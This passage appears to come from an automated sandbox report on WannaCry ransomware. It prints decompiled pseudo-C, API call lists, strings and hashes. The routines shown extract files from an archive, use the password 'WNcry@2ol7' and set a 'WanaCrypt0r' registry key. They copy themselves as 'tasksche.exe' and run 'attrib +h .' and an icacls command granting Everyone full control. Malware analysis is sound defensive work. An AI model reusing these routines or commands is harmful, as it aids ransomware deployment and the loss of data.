                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                              • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                                                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                                                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                                            • API String ID: 2238633743-1294736154
                                                            • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                            • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                                                            • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                                                            • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
                                                            				long _v8;
                                                            				char _v267;
                                                            				char _v268;
                                                            				struct _FILETIME _v284;
                                                            				struct _FILETIME _v292;
                                                            				struct _FILETIME _v300;
                                                            				long _v304;
                                                            				char _v568;
                                                            				char _v828;
                                                            				intOrPtr _t78;
                                                            				intOrPtr _t89;
                                                            				intOrPtr _t91;
                                                            				intOrPtr _t96;
                                                            				intOrPtr _t97;
                                                            				char _t100;
                                                            				void* _t112;
                                                            				void* _t113;
                                                            				int _t124;
                                                            				long _t131;
                                                            				intOrPtr _t136;
                                                            				char* _t137;
                                                            				char* _t144;
                                                            				void* _t148;
                                                            				char* _t150;
                                                            				void* _t154;
                                                            				signed int _t155;
                                                            				long _t156;
                                                            				void* _t157;
                                                            				char* _t158;
                                                            				long _t159;
                                                            				intOrPtr* _t161;
                                                            				long _t162;
                                                            				void* _t163;
                                                            				void* _t164;
                                                            
                                                            				_t154 = __edx;
                                                            				_t139 = __ecx;
                                                            				_t136 = _a16;
                                                            				_t161 = __ecx;
                                                            				if(_t136 == 3) {
                                                            					_t78 =  *((intOrPtr*)(__ecx + 4));
                                                            					_t155 = _a4;
                                                            					__eflags = _t155 - _t78;
                                                            					if(_t155 == _t78) {
                                                            						L14:
                                                            						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
                                                            						__eflags = _t156;
                                                            						if(_t156 <= 0) {
                                                            							E00406A97( *_t161);
                                                            							_t14 = _t161 + 4;
                                                            							 *_t14 =  *(_t161 + 4) | 0xffffffff;
                                                            							__eflags =  *_t14;
                                                            						}
                                                            						__eflags = _a7;
                                                            						if(_a7 == 0) {
                                                            							__eflags = _t156;
                                                            							if(_t156 <= 0) {
                                                            								__eflags = _t156 - 0xffffff96;
                                                            								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                            							}
                                                            							return 0x600;
                                                            						} else {
                                                            							L17:
                                                            							return 0;
                                                            						}
                                                            					}
                                                            					__eflags = _t78 - 0xffffffff;
                                                            					if(_t78 != 0xffffffff) {
                                                            						E00406A97( *__ecx);
                                                            						_pop(_t139);
                                                            					}
                                                            					_t89 =  *_t161;
                                                            					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                            					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
                                                            					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
                                                            						L3:
                                                            						return 0x10000;
                                                            					} else {
                                                            						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
                                                            						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
                                                            							L11:
                                                            							_t91 =  *_t161;
                                                            							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
                                                            							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
                                                            								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                            								 *(_t161 + 4) = _t155;
                                                            								_pop(_t139);
                                                            								goto L14;
                                                            							}
                                                            							E00406520(_t91);
                                                            							L10:
                                                            							goto L11;
                                                            						}
                                                            						E004064E2(_t139, _t89);
                                                            						goto L10;
                                                            					}
                                                            				}
                                                            				if(_t136 == 2 || _t136 == 1) {
                                                            					__eflags =  *(_t161 + 4) - 0xffffffff;
                                                            					if( *(_t161 + 4) != 0xffffffff) {
                                                            						E00406A97( *_t161);
                                                            						_pop(_t139);
                                                            					}
                                                            					_t96 =  *_t161;
                                                            					_t157 = _a4;
                                                            					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
                                                            					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
                                                            					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
                                                            						goto L3;
                                                            					} else {
                                                            						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
                                                            						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
                                                            							L27:
                                                            							_t97 =  *_t161;
                                                            							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
                                                            							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
                                                            								E00406C40(_t161, _t154, _t157,  &_v568);
                                                            								__eflags = _v304 & 0x00000010;
                                                            								if((_v304 & 0x00000010) == 0) {
                                                            									__eflags = _t136 - 1;
                                                            									if(_t136 != 1) {
                                                            										_t158 = _a8;
                                                            										_t137 = _t158;
                                                            										_t144 = _t158;
                                                            										_t100 =  *_t158;
                                                            										while(1) {
                                                            											__eflags = _t100;
                                                            											if(_t100 == 0) {
                                                            												break;
                                                            											}
                                                            											__eflags = _t100 - 0x2f;
                                                            											if(_t100 == 0x2f) {
                                                            												L44:
                                                            												_t137 =  &(_t144[1]);
                                                            												L45:
                                                            												_t100 = _t144[1];
                                                            												_t144 =  &(_t144[1]);
                                                            												continue;
                                                            											}
                                                            											__eflags = _t100 - 0x5c;
                                                            											if(_t100 != 0x5c) {
                                                            												goto L45;
                                                            											}
                                                            											goto L44;
                                                            										}
                                                            										strcpy( &_v268, _t158);
                                                            										__eflags = _t137 - _t158;
                                                            										if(_t137 != _t158) {
                                                            											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
                                                            											__eflags = _v268 - 0x2f;
                                                            											if(_v268 == 0x2f) {
                                                            												L56:
                                                            												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
                                                            												E00407070(0,  &_v268);
                                                            												_t164 = _t164 + 0x18;
                                                            												L49:
                                                            												__eflags = 0;
                                                            												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
                                                            												L50:
                                                            												__eflags = _t112 - 0xffffffff;
                                                            												_a4 = _t112;
                                                            												if(_t112 != 0xffffffff) {
                                                            													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
                                                            													__eflags =  *(_t161 + 0x13c);
                                                            													_pop(_t148);
                                                            													if( *(_t161 + 0x13c) == 0) {
                                                            														L00407700();
                                                            														_t148 = 0x4000;
                                                            														 *(_t161 + 0x13c) = _t113;
                                                            													}
                                                            													_t60 =  &_a12;
                                                            													 *_t60 = _a12 & 0x00000000;
                                                            													__eflags =  *_t60;
                                                            													while(1) {
                                                            														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
                                                            														_t164 = _t164 + 0x10;
                                                            														__eflags = _t159 - 0xffffff96;
                                                            														if(_t159 == 0xffffff96) {
                                                            															break;
                                                            														}
                                                            														__eflags = _t159;
                                                            														if(__eflags < 0) {
                                                            															L68:
                                                            															_a12 = 0x5000000;
                                                            															L71:
                                                            															__eflags = _a16 - 1;
                                                            															if(_a16 != 1) {
                                                            																CloseHandle(_a4);
                                                            															}
                                                            															E00406A97( *_t161);
                                                            															return _a12;
                                                            														}
                                                            														if(__eflags <= 0) {
                                                            															L64:
                                                            															__eflags = _a11;
                                                            															if(_a11 != 0) {
                                                            																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
                                                            																goto L71;
                                                            															}
                                                            															__eflags = _t159;
                                                            															if(_t159 == 0) {
                                                            																goto L68;
                                                            															}
                                                            															continue;
                                                            														}
                                                            														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
                                                            														__eflags = _t124;
                                                            														if(_t124 == 0) {
                                                            															_a12 = 0x400;
                                                            															goto L71;
                                                            														}
                                                            														goto L64;
                                                            													}
                                                            													_a12 = 0x1000;
                                                            													goto L71;
                                                            												}
                                                            												return 0x200;
                                                            											}
                                                            											__eflags = _v268 - 0x5c;
                                                            											if(_v268 == 0x5c) {
                                                            												goto L56;
                                                            											}
                                                            											__eflags = _v268;
                                                            											if(_v268 == 0) {
                                                            												L48:
                                                            												_t160 = _t161 + 0x140;
                                                            												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
                                                            												E00407070(_t160,  &_v268);
                                                            												_t164 = _t164 + 0x1c;
                                                            												goto L49;
                                                            											}
                                                            											__eflags = _v267 - 0x3a;
                                                            											if(_v267 != 0x3a) {
                                                            												goto L48;
                                                            											}
                                                            											goto L56;
                                                            										}
                                                            										_t37 =  &_v268;
                                                            										 *_t37 = _v268 & 0x00000000;
                                                            										__eflags =  *_t37;
                                                            										goto L48;
                                                            									}
                                                            									_t112 = _a8;
                                                            									goto L50;
                                                            								}
                                                            								__eflags = _t136 - 1;
                                                            								if(_t136 == 1) {
                                                            									goto L17;
                                                            								}
                                                            								_t150 = _a8;
                                                            								_t131 =  *_t150;
                                                            								__eflags = _t131 - 0x2f;
                                                            								if(_t131 == 0x2f) {
                                                            									L35:
                                                            									_push(_t150);
                                                            									_push(0);
                                                            									L37:
                                                            									E00407070();
                                                            									goto L17;
                                                            								}
                                                            								__eflags = _t131 - 0x5c;
                                                            								if(_t131 == 0x5c) {
                                                            									goto L35;
                                                            								}
                                                            								__eflags = _t131;
                                                            								if(_t131 == 0) {
                                                            									L36:
                                                            									_t162 = _t161 + 0x140;
                                                            									__eflags = _t162;
                                                            									_push(_t150);
                                                            									_push(_t162);
                                                            									goto L37;
                                                            								}
                                                            								__eflags = _t150[1] - 0x3a;
                                                            								if(_t150[1] != 0x3a) {
                                                            									goto L36;
                                                            								}
                                                            								goto L35;
                                                            							}
                                                            							E00406520(_t97);
                                                            							L26:
                                                            							goto L27;
                                                            						}
                                                            						E004064E2(_t139, _t96);
                                                            						goto L26;
                                                            					}
                                                            				} else {
                                                            					goto L3;
                                                            				}
                                                            			}





































                                                            0x00407136
                                                            0x00407136
                                                            0x00407140
                                                            0x00407148
                                                            0x0040714a
                                                            0x00407168
                                                            0x0040716b
                                                            0x0040716e
                                                            0x00407170
                                                            0x004071b7
                                                            0x004071c8
                                                            0x004071cd
                                                            0x004071cf
                                                            0x004071d3
                                                            0x004071d8
                                                            0x004071d8
                                                            0x004071d8
                                                            0x004071dc
                                                            0x004071dd
                                                            0x004071e1
                                                            0x004071ea
                                                            0x004071ec
                                                            0x004071fa
                                                            0x00000000
                                                            0x00407206
                                                            0x00000000
                                                            0x004071e3
                                                            0x004071e3
                                                            0x00000000
                                                            0x004071e3
                                                            0x004071e1
                                                            0x00407172
                                                            0x00407175
                                                            0x00407179
                                                            0x0040717e
                                                            0x0040717e
                                                            0x0040717f
                                                            0x00407181
                                                            0x00407185
                                                            0x00407188
                                                            0x0040715e
                                                            0x00000000
                                                            0x0040718a
                                                            0x0040718a
                                                            0x0040718d
                                                            0x00407196
                                                            0x00407196
                                                            0x00407198
                                                            0x0040719b
                                                            0x004071ad
                                                            0x004071b3
                                                            0x004071b6
                                                            0x00000000
                                                            0x004071b6
                                                            0x0040719e
                                                            0x00407195
                                                            0x00000000
                                                            0x00407195
                                                            0x00407190
                                                            0x00000000
                                                            0x00407190
                                                            0x00407188
                                                            0x0040714f
                                                            0x00407210
                                                            0x00407214
                                                            0x00407218
                                                            0x0040721d
                                                            0x0040721d
                                                            0x0040721e
                                                            0x00407220
                                                            0x00407223
                                                            0x00407227
                                                            0x0040722a
                                                            0x00000000
                                                            0x00407230
                                                            0x00407230
                                                            0x00407233
                                                            0x0040723c
                                                            0x0040723c
                                                            0x0040723e
                                                            0x00407241
                                                            0x00407255
                                                            0x0040725a
                                                            0x00407261
                                                            0x0040729c
                                                            0x0040729f
                                                            0x004072a9
                                                            0x004072ac
                                                            0x004072ae
                                                            0x004072b0
                                                            0x004072b2
                                                            0x004072b2
                                                            0x004072b4
                                                            0x00000000
                                                            0x00000000
                                                            0x004072b6
                                                            0x004072b8
                                                            0x004072be
                                                            0x004072be
                                                            0x004072c1
                                                            0x004072c1
                                                            0x004072c4
                                                            0x00000000
                                                            0x004072c4
                                                            0x004072ba
                                                            0x004072bc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004072bc
                                                            0x004072cf
                                                            0x004072d5
                                                            0x004072d8
                                                            0x00407347
                                                            0x0040734f
                                                            0x00407356
                                                            0x0040737b
                                                            0x0040738f
                                                            0x0040739e
                                                            0x004073a3
                                                            0x00407312
                                                            0x00407312
                                                            0x0040732b
                                                            0x00407331
                                                            0x00407331
                                                            0x00407334
                                                            0x00407337
                                                            0x004073b3
                                                            0x004073b8
                                                            0x004073c0
                                                            0x004073c6
                                                            0x004073c9
                                                            0x004073ce
                                                            0x004073cf
                                                            0x004073cf
                                                            0x004073d5
                                                            0x004073d5
                                                            0x004073d5
                                                            0x004073d9
                                                            0x004073eb
                                                            0x004073ed
                                                            0x004073f0
                                                            0x004073f3
                                                            0x00000000
                                                            0x00000000
                                                            0x004073f5
                                                            0x004073f7
                                                            0x0040742a
                                                            0x0040742a
                                                            0x0040745a
                                                            0x0040745a
                                                            0x0040745e
                                                            0x00407463
                                                            0x00407463
                                                            0x0040746b
                                                            0x00000000
                                                            0x00407473
                                                            0x004073f9
                                                            0x00407415
                                                            0x00407415
                                                            0x00407419
                                                            0x00407454
                                                            0x00000000
                                                            0x00407454
                                                            0x0040741b
                                                            0x0040741d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040741f
                                                            0x0040740b
                                                            0x00407411
                                                            0x00407413
                                                            0x00407433
                                                            0x00000000
                                                            0x00407433
                                                            0x00000000
                                                            0x00407413
                                                            0x00407421
                                                            0x00000000
                                                            0x00407421
                                                            0x00000000
                                                            0x00407339
                                                            0x00407358
                                                            0x0040735f
                                                            0x00000000
                                                            0x00000000
                                                            0x00407361
                                                            0x00407368
                                                            0x004072e1
                                                            0x004072e7
                                                            0x004072fc
                                                            0x0040730a
                                                            0x0040730f
                                                            0x00000000
                                                            0x0040730f
                                                            0x0040736e
                                                            0x00407375
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407375
                                                            0x004072da
                                                            0x004072da
                                                            0x004072da
                                                            0x00000000
                                                            0x004072da
                                                            0x004072a1
                                                            0x00000000
                                                            0x004072a1
                                                            0x00407263
                                                            0x00407266
                                                            0x00000000
                                                            0x00000000
                                                            0x0040726c
                                                            0x0040726f
                                                            0x00407271
                                                            0x00407273
                                                            0x00407283
                                                            0x00407283
                                                            0x00407284
                                                            0x00407290
                                                            0x00407290
                                                            0x00000000
                                                            0x00407296
                                                            0x00407275
                                                            0x00407277
                                                            0x00000000
                                                            0x00000000
                                                            0x00407279
                                                            0x0040727b
                                                            0x00407288
                                                            0x00407288
                                                            0x00407288
                                                            0x0040728e
                                                            0x0040728f
                                                            0x00000000
                                                            0x0040728f
                                                            0x0040727d
                                                            0x00407281
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407281
                                                            0x00407244
                                                            0x0040723b
                                                            0x00000000
                                                            0x0040723b
                                                            0x00407236
                                                            0x00000000
                                                            0x00407236
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s%s$%s%s%s$:$\
                                                            • API String ID: 0-1100577047
                                                            • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                            • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                            • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                            • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0040203B(intOrPtr* __eax, void* __edi) {
                                                            				void* _t25;
                                                            				intOrPtr* _t33;
                                                            				int _t42;
                                                            				CHAR* _t63;
                                                            				void* _t64;
                                                            				char** _t66;
                                                            
                                                            				__imp____p___argv();
                                                            				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
                                                            					L4:
                                                            					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
                                                            						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
                                                            					}
                                                            					SetCurrentDirectoryA(_t64 - 0x20c);
                                                            					E004010FD(1);
                                                            					 *_t66 = "WNcry@2ol7";
                                                            					_push(_t42);
                                                            					L00401DAB();
                                                            					E00401E9E();
                                                            					E00401064("attrib +h .", _t42, _t42);
                                                            					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
                                                            					_t25 = E0040170A();
                                                            					_t74 = _t25;
                                                            					if(_t25 != 0) {
                                                            						E004012FD(_t64 - 0x6e4, _t74);
                                                            						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
                                                            							 *(_t64 - 4) = _t42;
                                                            							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
                                                            								_t33 = E00402924(_t32, "TaskStart");
                                                            								_t78 = _t33 - _t42;
                                                            								if(_t33 != _t42) {
                                                            									 *_t33(_t42, _t42);
                                                            								}
                                                            							}
                                                            						}
                                                            						E0040137A(_t64 - 0x6e4, _t78);
                                                            					}
                                                            					goto L13;
                                                            				} else {
                                                            					_t63 = "tasksche.exe";
                                                            					CopyFileA(_t64 - 0x20c, _t63, _t42);
                                                            					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						L13:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}









                                                            0x00402040
                                                            0x00402054
                                                            0x0040208e
                                                            0x004020a3
                                                            0x004020b1
                                                            0x004020b3
                                                            0x004020bb
                                                            0x004020c3
                                                            0x004020c8
                                                            0x004020cf
                                                            0x004020d0
                                                            0x004020d5
                                                            0x004020e1
                                                            0x004020ed
                                                            0x004020f5
                                                            0x004020fa
                                                            0x004020fc
                                                            0x00402104
                                                            0x00402119
                                                            0x0040212a
                                                            0x00402134
                                                            0x0040214b
                                                            0x00402151
                                                            0x00402154
                                                            0x00402158
                                                            0x00402158
                                                            0x00402154
                                                            0x00402134
                                                            0x00402160
                                                            0x00402160
                                                            0x00000000
                                                            0x00402061
                                                            0x00402061
                                                            0x0040206f
                                                            0x0040207f
                                                            0x00000000
                                                            0x00402165
                                                            0x00402165
                                                            0x0040216b
                                                            0x0040216b
                                                            0x0040207f

                                                            APIs
                                                            • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                            • strcmp.MSVCRT(?), ref: 0040204B
                                                            • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                            • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                              • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                            • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                            • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                            • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                              • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                              • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                              • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                              • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                            • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                            • API String ID: 1074704982-2844324180
                                                            • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                            • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                            • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                            • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E004010FD(intOrPtr _a4) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				int _v16;
                                                            				void _v196;
                                                            				long _v216;
                                                            				void _v735;
                                                            				char _v736;
                                                            				signed int _t44;
                                                            				void* _t46;
                                                            				signed int _t55;
                                                            				signed int _t56;
                                                            				char* _t72;
                                                            				void* _t77;
                                                            
                                                            				_t56 = 5;
                                                            				memcpy( &_v216, L"Software\\", _t56 << 2);
                                                            				_push(0x2d);
                                                            				_v736 = _v736 & 0;
                                                            				_v8 = _v8 & 0x00000000;
                                                            				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
                                                            				asm("stosw");
                                                            				asm("stosb");
                                                            				wcscat( &_v216, L"WanaCrypt0r");
                                                            				_v12 = _v12 & 0x00000000;
                                                            				_t72 = "wd";
                                                            				do {
                                                            					_push( &_v8);
                                                            					_push( &_v216);
                                                            					if(_v12 != 0) {
                                                            						_push(0x80000001);
                                                            					} else {
                                                            						_push(0x80000002);
                                                            					}
                                                            					RegCreateKeyW();
                                                            					if(_v8 != 0) {
                                                            						if(_a4 == 0) {
                                                            							_v16 = 0x207;
                                                            							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
                                                            							asm("sbb esi, esi");
                                                            							_t77 =  ~_t44 + 1;
                                                            							if(_t77 != 0) {
                                                            								SetCurrentDirectoryA( &_v736);
                                                            							}
                                                            						} else {
                                                            							GetCurrentDirectoryA(0x207,  &_v736);
                                                            							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
                                                            							asm("sbb esi, esi");
                                                            							_t77 =  ~_t55 + 1;
                                                            						}
                                                            						RegCloseKey(_v8);
                                                            						if(_t77 != 0) {
                                                            							_t46 = 1;
                                                            							return _t46;
                                                            						} else {
                                                            							goto L10;
                                                            						}
                                                            					}
                                                            					L10:
                                                            					_v12 = _v12 + 1;
                                                            				} while (_v12 < 2);
                                                            				return 0;
                                                            			}
















                                                            0x0040110f
                                                            0x00401116
                                                            0x00401118
                                                            0x0040111c
                                                            0x00401129
                                                            0x0040113a
                                                            0x0040113c
                                                            0x0040113e
                                                            0x0040114b
                                                            0x00401151
                                                            0x00401157
                                                            0x0040115c
                                                            0x00401164
                                                            0x0040116b
                                                            0x0040116c
                                                            0x00401175
                                                            0x0040116e
                                                            0x0040116e
                                                            0x0040116e
                                                            0x0040117a
                                                            0x00401183
                                                            0x0040118c
                                                            0x004011cf
                                                            0x004011e4
                                                            0x004011ee
                                                            0x004011f0
                                                            0x004011f1
                                                            0x004011fa
                                                            0x004011fa
                                                            0x0040118e
                                                            0x0040119a
                                                            0x004011bd
                                                            0x004011c7
                                                            0x004011c9
                                                            0x004011c9
                                                            0x00401203
                                                            0x0040120b
                                                            0x00401222
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040120b
                                                            0x0040120d
                                                            0x0040120d
                                                            0x00401210
                                                            0x00000000

                                                            APIs
                                                            • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                            • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                            • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                            • strlen.MSVCRT(?), ref: 004011A7
                                                            • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                            • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                            • String ID: 0@$Software\$WanaCrypt0r
                                                            • API String ID: 865909632-3421300005
                                                            • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                            • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                            • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                            • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E00401B5F(intOrPtr _a4) {
                                                            				void _v202;
                                                            				short _v204;
                                                            				void _v722;
                                                            				long _v724;
                                                            				signed short _v1240;
                                                            				void _v1242;
                                                            				long _v1244;
                                                            				void* _t55;
                                                            				signed int _t65;
                                                            				void* _t72;
                                                            				long _t83;
                                                            				void* _t94;
                                                            				void* _t98;
                                                            
                                                            				_t83 =  *0x40f874; // 0x0
                                                            				_v1244 = _t83;
